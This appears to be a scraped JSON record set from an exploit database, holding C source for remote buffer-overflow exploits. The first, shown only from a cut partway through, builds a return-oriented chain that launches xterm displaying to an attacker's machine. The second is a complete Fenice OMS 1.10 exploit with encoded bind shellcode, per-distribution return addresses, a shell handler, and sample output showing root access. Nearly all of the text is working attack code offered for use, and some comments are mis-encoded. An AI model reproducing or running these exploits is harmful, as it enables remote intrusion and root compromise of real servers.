*/\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,R_STR);\r\n\t\ti+=1; /* \"R\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\ti+=1; /* \"6\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_3);\r\n\t\ti+=3; /* \"bin\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_2);\r\n\t\ti+=1; /* \"x\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_4);\r\n\t\ti+=4; /* \"term\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[2]: -display\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,DISPLAY_OPTION);\r\n\t\ti+=3; /* \"-di\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// argv[3]: xhost_ip:0\r\n\tfor(ip=0;ip<10;ip++){\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\r\n\t\tswitch(xhost_ip[ip]){\r\n\t\t\tcase '0':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '1':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '2':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_2);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '3':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_3);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '4':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_4);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '5':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_5);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '6':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_6);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '7':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_7);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '8':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_8);\r\n\t\t\t\tbreak;\r\n\t\t\tcase '9':\r\n\t\t\t\t__GOGOSSING(do_ex,j,NUM_9);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t\ti+=1;\r\n\t}\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,COLON_STR);\r\n\t\ti+=1; /* \":\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_0);\r\n\t\ti+=1; /* \"0\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NULL_STR);\r\n\t\ti+=1; /* null */\r\n\t}\r\n\t// exploit\r\n\t{\r\n\t\t__GOGOSSING(do_ex,j,GETGID_PLT); // getgidAC GOT?A execle() CO?o?\u00c2\u00a6 \u00c2\u00b0?Ao?C\u00c2\u00b7I, PLT\u00c2\u00b7I CU\u00c2\u00b5e?\u00c2\u00b5 \u00c2\u00b0??E.\r\n\t\t__GOGOSSING(do_ex,j,0x82828282); // callAI ???I?C\u00c2\u00b7I, AIAu CO?o %eip?\u00c2\u00a6 ?e?ACO?\u00c2\u00ad A\u00c2\u00a4?o.\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */\r\n\t\t__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */\r\n\t\t__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */\r\n\t\t__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */\r\n\t}\r\n\tprintf(\"** exploit size: %d\\n\",strlen(do_ex));\r\n\r\n\ti=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));\r\n\tif(i==-1){\r\n\t\tprintf(\"** connect() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\telse {\r\n\t\tprintf(\"** send exploit\\n\");\r\n\t\tsend(sock,do_ex,j,0);\r\n\r\n\t\tprintf(\"** sleepppppppp...\\n\");\r\n\t\tsleep(1);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t}\r\n\tclose(sock);\r\n\r\n\tprintf(\"** xhost, check it up, now!\\n**\\n*/\\n\");\r\n\texit(0);\r\n}\r\n\r\n/* eoc */\r\n\r\n\r\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8911"}, {"lastseen": "2018-04-15T01:51:41", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2006-04-25T00:00:00", "published": "2006-04-25T00:00:00", "id": "1337DAY-ID-8700", "href": "https://0day.today/exploit/description/8700", "type": "zdt", "title": "Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit", "sourceData": "=================================================================\r\nFenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit\r\n=================================================================\r\n\r\n/*\r\n\tIHS Iran Homeland Security public source code\r\n\tFenice - Open Media Streaming Server remote BOF exploit\r\n\tauthor : c0d3r \"kaveh razavi\" [email\u00a0protected]\r\n\tpackage : fenice-1.10.tar.gz and prolly prior versions\r\n\tworkaround : update after patch release\r\n\tadvisory : http://www.securityfocus.com/bid/17678\r\n\tcompany address : http://streaming.polito.it/server\r\n\ttimeline :\r\n\t23 Apr 2006 : vulnerability reported by Luigi Auriemma\r\n\t25 Sep 2006 : IHS exploit released \r\n\texploit features :\r\n\t1) a global offset \r\n\t2) reliable metasploit shellcode \r\n\t3) autoconnect to shell\r\n\tbad chars : 0x00 0x05 encoder : PexAlphaNum \r\n\tcompiled with gcc under Linux : gcc fenice.c -o fenice \r\n\r\n **************************************************************\r\n\t \r\n\tExploitation Method : linux-gate.so.1\r\n\t \r\n\tthe refrence written by izik could be downloaded from milw0rm.\r\n\tafter some research I realized that the offset is very stable\r\n\taround 2.6 kernels compiled from source. the VA patch will\r\n\teasily get bypassed. if you want to exploit 2.4 kernels \r\n\tyou can jump directly to the shellcode , there isn't any\r\n\tstack randomization for sure in 2.4.* by default.\r\n\tthe offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag\r\n\t(slackware 10.2), also on 2.6.15.4 compiled with i386 flag \r\n\t(Fedora core 2) was same. on default installation of fc3 the\r\n\tlinux-gate.so.1 has null at the first , so think of another \r\n\tway to jump to the shellcode.\r\n\r\n **************************************************************\r\n\r\n\tgreeting to :\r\n\r\n\twww.ihsteam.com the team , LorD and NT \r\n\twww.ihsteam.net english version ,\r\n\twww.c0d3r.org my home :)\r\n\twww.underground.ir friends who are participating in the forums\r\n\twww.exploitdev.com Jamie and Ben , those times are now legend\r\n\twww.milw0rm.com str0ke , keep the good job going\r\n\r\n/*\r\n/*\r\n\r\n[c0d3r]$ gcc fenice.c -o fenice\r\n[c0d3r]$ ./fenice 127.0.0.1 554 0\r\n\r\n-------- fenice - Open Media Streaming Project remote BOF exploit\r\n-------- copyrighted by c0d3r of IHS 2006\r\n\r\n[+] Targeting slackware 10.2\r\n[+] Shellcode size : 329 bytes\r\n[+] Building overflow string\r\n[+] attacking host 127.0.0.1\r\n[+] packet size = 750 byte\r\n[+] connected\r\n[+] sending the overflow string\r\n[+] exploit sent successfully to 127.0.0.1\r\n[+] trying to get shell\r\n[+] connecting to 127.0.0.1 on port 4444\r\n[+] target exploited successfully\r\n[+] Dropping into shell\r\n\r\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)\r\nLinux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux\r\n\r\n\r\n*/\r\n\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define inc 0x41\r\n#define size 750\r\n\r\n\r\nvoid gotshell(int new_sock);\r\nvoid usage();\r\n\r\n// metasploit.com shellcode - badchars = 0x00 0x05\r\n// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum\r\n// I had a bit difficulty to execute my shellcode because some chars\r\n// badly interpreted by fenice , anyway viva metasploit !\r\n\r\nunsigned char shellcode[] =\r\n\r\n\"\\xeb\\x59\\x59\\x59\\x59\\xeb\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\"\r\n\"\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\x59\\xe8\\xa4\\xff\\xff\\xff\"\r\n\"\\x4f\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x30\\x42\\x36\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\"\r\n\"\\x32\\x42\\x44\\x42\\x48\\x34\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\"\r\n\"\\x51\\x42\\x30\\x41\\x44\\x41\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\"\r\n\"\\x41\\x43\\x4b\\x4d\\x43\\x45\\x43\\x54\\x43\\x45\\x4c\\x56\\x44\\x50\\x4c\\x36\"\r\n\"\\x48\\x36\\x4a\\x55\\x49\\x49\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x58\\x48\\x49\"\r\n\"\\x43\\x54\\x44\\x45\\x48\\x36\\x4a\\x46\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\"\r\n\"\\x49\\x38\\x41\\x4e\\x4c\\x46\\x48\\x46\\x4a\\x35\\x42\\x35\\x41\\x35\\x48\\x45\"\r\n\"\\x49\\x48\\x41\\x4e\\x4d\\x4c\\x42\\x48\\x42\\x4b\\x48\\x36\\x41\\x4d\\x43\\x4e\"\r\n\"\\x4d\\x4c\\x42\\x58\\x44\\x45\\x44\\x55\\x48\\x45\\x43\\x54\\x49\\x38\\x41\\x4e\"\r\n\"\\x42\\x4b\\x48\\x46\\x4d\\x4c\\x42\\x58\\x43\\x59\\x4c\\x56\\x44\\x30\\x49\\x55\"\r\n\"\\x42\\x4b\\x4f\\x33\\x4d\\x4c\\x42\\x48\\x49\\x34\\x49\\x37\\x49\\x4f\\x42\\x4b\"\r\n\"\\x4b\\x30\\x44\\x55\\x4a\\x46\\x4f\\x52\\x4f\\x32\\x43\\x47\\x4a\\x46\\x4a\\x56\"\r\n\"\\x4f\\x42\\x44\\x56\\x49\\x36\\x50\\x36\\x49\\x48\\x43\\x4e\\x44\\x55\\x43\\x55\"\r\n\"\\x49\\x58\\x41\\x4e\\x4d\\x4c\\x42\\x48\\x5a\";\r\n\r\nchar slack [] = \"\\x77\\xe7\\xff\\xff\"; // slackware 10.2 2.6.15.6 \r\nchar FC2_2_6_15[] = \"\\x77\\xe7\\xff\\xff\";\t// Fedora core 2 , 2.6.15.4\r\nchar debug [] = \"\\xdd\\xdd\\xdd\\xdd\";\t// debugging purpose\r\nchar ret[4];\r\nchar get [] = \"\\x47\\x45\\x54\\x20\\x2f\";\r\nstruct hostent *hp;\r\nstruct sockaddr_in con;\r\nunsigned int rc,rc2,len=16,sock,sock2,os,addr,port;\r\nchar buffer[size];\r\n\r\n// gotshell is from jamie (darkdud3) remote exploit sample \r\n// with a bit change\r\n\r\nvoid gotshell(int sock){\r\n\r\n\tfd_set fd_read;\r\n\tchar buff[1024];\r\n\tchar cmd[100] = \"id;uname -a\\n\";\r\n\tint n;\r\n\r\n\tFD_ZERO(&fd_read);\r\n\tFD_SET(sock, &fd_read);\r\n\tFD_SET(0, &fd_read);\r\n\tsend(sock, cmd, strlen(cmd), 0);\r\n\twhile(1) {\r\n\t\tFD_SET(sock,&fd_read);\r\n\t\tFD_SET(0,&fd_read);\r\n\t\tif(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;\r\n\t\tif( FD_ISSET(sock, &fd_read) ) {\r\n\t\t\tif((n=recv(sock,buff,sizeof(buff),0))<0){\r\n\t\t\tfprintf(stderr, \"EOF\\n\");\r\n\t\t\texit(2);\r\n\t\t\t}\r\n\t\t\tif(write(1,buff,n)<0)break;\r\n\t\t}\r\n\t\tif ( FD_ISSET(0, &fd_read) ) {\r\n\t\t\tif((n=read(0,buff,sizeof(buff)))<0){\r\n\t\t\t\tfprintf(stderr,\"EOF\\n\");\r\n\t\t\t\texit(2);\r\n\t\t\t}\r\n\t\t\tif(send(sock,buff,n,0)<0) break;\r\n\t\t}\r\n\t\tusleep(10);\r\n\t}\r\n\tfprintf(stderr,\"Connection aborted, select failed()\\n\");\r\n\texit(0);\r\n}\r\n\r\nvoid usage(char *arg){\r\n\tprintf(\"-------- usage : %s host_or_ip port target\\n\",arg);\r\n\tprintf(\"-------- example : %s localhost 554 0\\n\",arg);\r\n\tprintf(\"-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\\n\");\r\n\tprintf(\"-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\\n\");\r\n\tprintf(\"-------- target 2 : debug\t\t\t : 2\\n\\n\");\r\n\texit(-1) ;\r\n}\r\n\r\nint main(int argc,char **argv){\r\n\r\n\tprintf(\"\\n-------- fenice - Open Media Streaming Project remote BOF exploit\\n\");\r\n\tprintf(\"-------- copyrighted by c0d3r of IHS 2006\\n\\n\");\r\n\tif(argc != 4)\r\n\t\tusage(argv[0]);\r\n\tos = (unsigned short)atoi(argv[3]);\r\n\tswitch(os){\r\n\t\tcase 0:\r\n\t\tstrcat(ret,slack);\r\n\t\tprintf(\"[+] Targeting slackware 10.2\\n\");\r\n\t\tbreak;\r\n\t\tcase 1:\r\n\t\tstrcat(ret,FC2_2_6_15);\r\n\t\tprintf(\"[+] Targeting fedora core 2 \\n\");\r\n\t\tbreak;\r\n\t\tcase 2:\r\n\t\tstrcat(ret,debug); \r\n\t\tprintf(\"[+] Debugging\\n\");\r\n\t\tbreak;\r\n\t\tdefault:\r\n\t\tprintf(\"\\n[-] This target doesnt exist in the list\\n\\n\");\r\n\r\n\texit(-1);\r\n\t}\r\n\tprintf(\"[+] Shellcode size : %d bytes\\n\",sizeof(shellcode)-1);\r\n\tprintf(\"[+] Building overflow string\\n\");\r\n\r\n\t// heart of exploit\r\n\r\n\tmemset(buffer,inc,size);\r\n\tmemcpy(buffer,get,5);\r\n\tmemcpy(buffer+5+361,ret,4);\r\n\tmemcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);\r\n\tbuffer[size] = 0;\r\n\r\n\t// EO heart of exploit\r\n\r\n\thp = gethostbyname(argv[1]);\r\n\tif (!hp)\r\n\t\taddr = inet_addr(argv[1]);\r\n\tif ((!hp) && (addr == INADDR_NONE) ){\r\n\t\tprintf(\"[-] unable to resolve %s\\n\",argv[1]);\r\n\t\texit(-1);\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n\tif (!sock){ \r\n\t\tprintf(\"[-] socket() error...\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\tif (hp != NULL)\r\n\t\tmemcpy(&(con.sin_addr),hp->h_addr,hp->h_length);\r\n\telse\r\n\t\tcon.sin_addr.s_addr = addr;\r\n\tif (hp)\r\n\t\tcon.sin_family = hp->h_addrtype;\r\n\telse\r\n\t\tcon.sin_family = AF_INET;\r\n\tport=atoi(argv[2]);\r\n\tcon.sin_port=htons(port);\r\n\tprintf(\"[+] attacking host %s\\n\" , argv[1]) ;\r\n\tsleep(1);\r\n\tprintf(\"[+] packet size = %d byte\\n\" , sizeof(buffer));\r\n\trc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));\r\n\tif(!rc){\r\n\t\tsleep(1) ;\r\n\t\tprintf(\"[+] connected\\n\") ;\r\n\t\tprintf(\"[+] sending the overflow string\\n\") ;\r\n\t\tsend(sock,buffer,strlen(buffer),0);\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsleep(1) ;\r\n\t\tsend(sock,\"\\n\",1,0);\r\n\t\tsleep(1) ;\r\n\t\tprintf(\"[+] exploit sent successfully to %s \\n\" , argv[1]);\r\n\t\tprintf(\"[+] trying to get shell\\n\");\r\n\t\tprintf(\"[+] connecting to %s on port 4444\\n\",argv[1]);\r\n\t\tsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n\t\tif (!sock){ \r\n\t\t\tprintf(\"[-] socket() error...\\n\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tcon.sin_family = AF_INET;\r\n\t\tcon.sin_port=htons(4444);\r\n\t\trc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));\r\n\t\tif(rc2 != 0) {\r\n\t\tprintf(\"[-] exploit probably failed\\n\");\r\n\t\texit(-1);\r\n\t\t}\r\n\t\tif(!rc2){\r\n\t\t\tprintf(\"[+] target exploited successfully\\n\");\r\n\t\t\tprintf(\"[+] Dropping into shell\\n\\n\");\r\n\t\t\tgotshell(sock);\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\n# 0day.today [2018-04-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8700"}]}